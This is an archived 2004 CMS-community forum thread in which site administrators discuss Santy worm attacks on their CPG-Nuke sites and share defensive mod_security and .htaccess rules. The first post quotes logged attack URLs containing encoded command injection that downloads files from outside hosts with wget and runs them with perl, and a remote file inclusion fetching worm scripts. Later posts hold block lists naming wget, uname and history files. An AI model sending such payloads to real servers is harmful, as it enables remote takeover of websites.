| Topic Archived |
View previous topic :: View next topic |
| Author |
Message |
DJ Maze
Developer
 Offline
Joined: Apr 19, 2004
Posts: 5683
Location: http://tinyurl.com/5z8dmv
|
 Posted: Sat Dec 25, 2004 2:25 pm
Post subject: Help CPG-Nuke is under attack LMAO |
|
Are people that stupid ?
They are trying these already all day 
| Code:: |
index.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20http://fff.gratishost.com/sess_0bc3910d07edb36750a9babbd179edb2;perl%20sess_0bc3910d07edb36750a9babbd179edb2;wget%20http://fff.gratishost.com/wow.a;perl%20wow.a%3B%
index.php?name=Forums&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%25
index.php?name=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.t
|
DJ Maze's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Fedora 15 / 2.2.22 / 5.5.20 / 5.3.10 / CVS
|
|
| Back to top |
|
 |
xfsunoles
XHTML Specialist
Offline
Joined: Apr 30, 2004
Posts: 2502
Location: Melbourne, Florida
|
Posted: Sat Dec 25, 2004 2:32 pm
Post subject: Re: Help CPG-Nuke is under attack LMAO |
|
wow, they don't stop launch shell worm. well, it unsuccessful.
_________________
Firefox is my Favorite Browser
xfsunoles's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Apache/1.3.34 (Unix)/4.0.25-standard/4.4.1/CVS
|
|
| Back to top |
|
|
Stephen
Silver Supporter
Offline
Joined: Apr 21, 2004
Posts: 734
|
Posted: Sat Dec 25, 2004 3:22 pm
Post subject: Re: Help CPG-Nuke is under attack LMAO |
|
I've stopped about 40 attempts so far with mod_security :D
Heres one simple line to add to your mod_security config (or if you host has mod_security installed add to htaccess file) and it will stop them dead.
| Code:: |
SecFilterSelective THE_REQUEST "wget " |
I use a lot more than that however, ranging from uname to xss :D
Edit..
Heres my entire mod_security config file. All rules, they also stop the nmap version scan.
| Code:: |
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "uname -a"
SecFilterSelective THE_REQUEST "\.htgroup"
SecFilterSelective THE_REQUEST "\.htaccess"
SecFilter "javascript\://"
SecFilter "img src=javascript"
SecFilterSelective THE_REQUEST "cd\.\."
SecFilterSelective THE_REQUEST "///cgi-bin"
SecFilterSelective THE_REQUEST "/cgi-bin///"
SecFilterSelective THE_REQUEST "/~root"
SecFilterSelective THE_REQUEST "/~ftp"
SecFilterSelective THE_REQUEST "/htgrep" chain
SecFilter "hdr=/"
SecFilterSelective THE_REQUEST "/htgrep" log,pass
SecFilterSelective THE_REQUEST "/\.history"
SecFilterSelective THE_REQUEST "/\.bash_history"
SecFilterSelective THE_REQUEST "/~nobody"
SecFilterSelective THE_REQUEST "<script"
SecFilterSelective THE_REQUEST "\?STRENGUR"
SecFilter "_PHPLIB\[libdir\]"
SecFilterSelective THE_REQUEST "^(HELP|default|\||TNMP|DmdT|\:)$"
SecFilterSelective SCRIPT_FILENAME "export\.php$" chain
SecFilterSelective ARG_what "\.\."
SecFilter "<(.|\n)+>" |
Edit2: disabled smiles :'(
Stephen's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Cent OS :: 1.3.34 :: 4.1.13 :: 4.4.2 :: CVS
Last edited by Stephen on Sun Dec 26, 2004 5:13 pm; edited 1 time in total |
|
| Back to top |
|
|
Mystic
Diamond Supporter
Offline
Joined: Jun 25, 2004
Posts: 1312
Location: Spokane, WA USA
|
Posted: Sat Dec 25, 2004 4:29 pm
Post subject: Re: Help CPG-Nuke is under attack LMAO |
|
DJ,
How are you detecting these attempts?
Stephen,
Where do you insert this code at?
_________________
- |\/|ystic
Mystic's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Linux 2.6.20-16/Apache/5.0.38/5.2.1/9.0.6.1
|
|
| Back to top |
|
|
DJ Maze
Developer
Offline
Joined: Apr 19, 2004
Posts: 5683
Location: http://tinyurl.com/5z8dmv
|
Posted: Sat Dec 25, 2004 5:09 pm
Post subject: Re: Help CPG-Nuke is under attack LMAO |
|
It's all in the "Who is where" block
DJ Maze's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Fedora 15 / 2.2.22 / 5.5.20 / 5.3.10 / CVS
|
|
| Back to top |
|
|
Mythical
Newbie
Offline
Joined: Oct 13, 2004
Posts: 3
|
Posted: Sat Dec 25, 2004 5:26 pm
Post subject: Re: Help CPG-Nuke is under attack LMAO |
|
| DJMaze wrote: |
| It's all in the "Who is where" block |
You mean the same one this site doesn't use because
| akamu wrote: |
| We don't have the who is where activated because of the sheer number of visitors and the extra queries this adds to the load on mysql. |
Seems more like it's activated but for admin only. A little honesty never hurt anyone.
Mythical's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
?
|
|
| Back to top |
|
|
DJ Maze
Developer
Offline
Joined: Apr 19, 2004
Posts: 5683
Location: http://tinyurl.com/5z8dmv
|
Posted: Sat Dec 25, 2004 5:50 pm
Post subject: Re: Help CPG-Nuke is under attack LMAO |
|
Apache logs.
By telling it as the block it is more understandable for most people 
DJ Maze's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Fedora 15 / 2.2.22 / 5.5.20 / 5.3.10 / CVS
|
|
| Back to top |
|
|
Jeruvy
Security Team
Offline
Joined: Apr 23, 2004
Posts: 1432
Location: Canada
|
Posted: Sat Dec 25, 2004 8:29 pm
Post subject: Re: Help CPG-Nuke is under attack LMAO |
|
Santy.C
Merry Christmas.
_________________
J.
j e r u v y a t y a h o o d o t c o m
Need help? Look here: www.dragonflycms.org/W...d=112.html
Need to chat? Look for me on irc.freenode.net
Jeruvy's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Ubuntu7.10/Debian3.1 - 2.2.3/1.3.37 - 5.0.38/4.0.27 - 5.2.1/4.4.7 - CVS/9.1.2}
|
|
| Back to top |
|
|
Stephen
Silver Supporter
Offline
Joined: Apr 21, 2004
Posts: 734
|
Posted: Sun Dec 26, 2004 4:25 am
Post subject: Re: Help CPG-Nuke is under attack LMAO |
|
Mystic,
You have to have mod_security installed (server side) for that to work.
Then after that, I beleive you can put it in your httpd.conf or .htaccess file. 
Stephen's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Cent OS :: 1.3.34 :: 4.1.13 :: 4.4.2 :: CVS
|
|
| Back to top |
|
|
Mystic
Diamond Supporter
Offline
Joined: Jun 25, 2004
Posts: 1312
Location: Spokane, WA USA
|
Posted: Sun Dec 26, 2004 4:52 am
Post subject: Re: Help CPG-Nuke is under attack LMAO |
|
Thanks for the clarification Stephen.
_________________
- |\/|ystic
Mystic's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Linux 2.6.20-16/Apache/5.0.38/5.2.1/9.0.6.1
|
|
| Back to top |
|
|
DJ Maze
Developer
Offline
Joined: Apr 19, 2004
Posts: 5683
Location: http://tinyurl.com/5z8dmv
|
Posted: Mon Dec 27, 2004 12:23 am
Post subject: Re: Help CPG-Nuke is under attack LMAO |
|
Hey 2 new sites 
midomain.false.ca <- down
envidiosos.org/~pillar/ <- still up
And the biggest fun: due to LEO the worm urls are totally messed up
DJ Maze's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Fedora 15 / 2.2.22 / 5.5.20 / 5.3.10 / CVS
|
|
| Back to top |
|
|
djdevon3
Gold Supporter
Offline
Joined: Aug 05, 2004
Posts: 4363
|
Posted: Mon Dec 27, 2004 12:56 am
Post subject: Re: Help CPG-Nuke is under attack LMAO |
|
all hail the cows
djdevon3's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Linux/1.3.33/4.4/4.3.11
|
|
| Back to top |
|
|
tank
Gold Supporter
Offline
Joined: Apr 20, 2004
Posts: 824
Location: Houston, Texas USA
|
Posted: Mon Dec 27, 2004 1:54 am
Post subject: Re: Help CPG-Nuke is under attack LMAO |
|
Based on several sites I've added this to my .htaccess at the top.
| Code:: |
#Check for Santy Worms and redirect them to a phantom site
#Variant-1
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
#Variant-2
RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
RewriteCond %{REQUEST_URI} .*midomain/.false/.ca [NC,OR]
RewriteCond %{REQUEST_URI} .*envidiosos.org/~pillar/ [NC,OR]
#Variant-3
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC]
RewriteRule ^.*$ http://www.goawayanddontcomeback.com [L]
#end santy check
|
anyone see any problem with that? I'm no htaccess guru but it seems to redirect any potential attacks elsewhere. Just not sure the implications to CPG-Nuke. It will only be on 8.2 so I'm sure it won't interefere with the LEO
_________________
Search is your friend
tank's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Fedora Core 1, Apache 1.3.33, Mysql 4.1.14, PHP 5.0.5 w/ APC cache, Dragonfly 9.0.6.1
|
|
| Back to top |
|
|
xfsunoles
XHTML Specialist
Offline
Joined: Apr 30, 2004
Posts: 2502
Location: Melbourne, Florida
|
Posted: Mon Dec 27, 2004 1:57 am
Post subject: Re: Help CPG-Nuke is under attack LMAO |
|
about redirect URL, what best URL we should pick on?
_________________
Firefox is my Favorite Browser
xfsunoles's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Apache/1.3.34 (Unix)/4.0.25-standard/4.4.1/CVS
|
|
| Back to top |
|
|
djdevon3
Gold Supporter
Offline
Joined: Aug 05, 2004
Posts: 4363
|
Posted: Mon Dec 27, 2004 2:04 am
Post subject: Re: Help CPG-Nuke is under attack LMAO |
|
how about locators.com? responsible for some of the admin referal spamming.  spam the spammers!
djdevon3's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Linux/1.3.33/4.4/4.3.11
|
|
| Back to top |
|
|
|
|
Forum FAQ
Log in to check your private messages
Login
Search
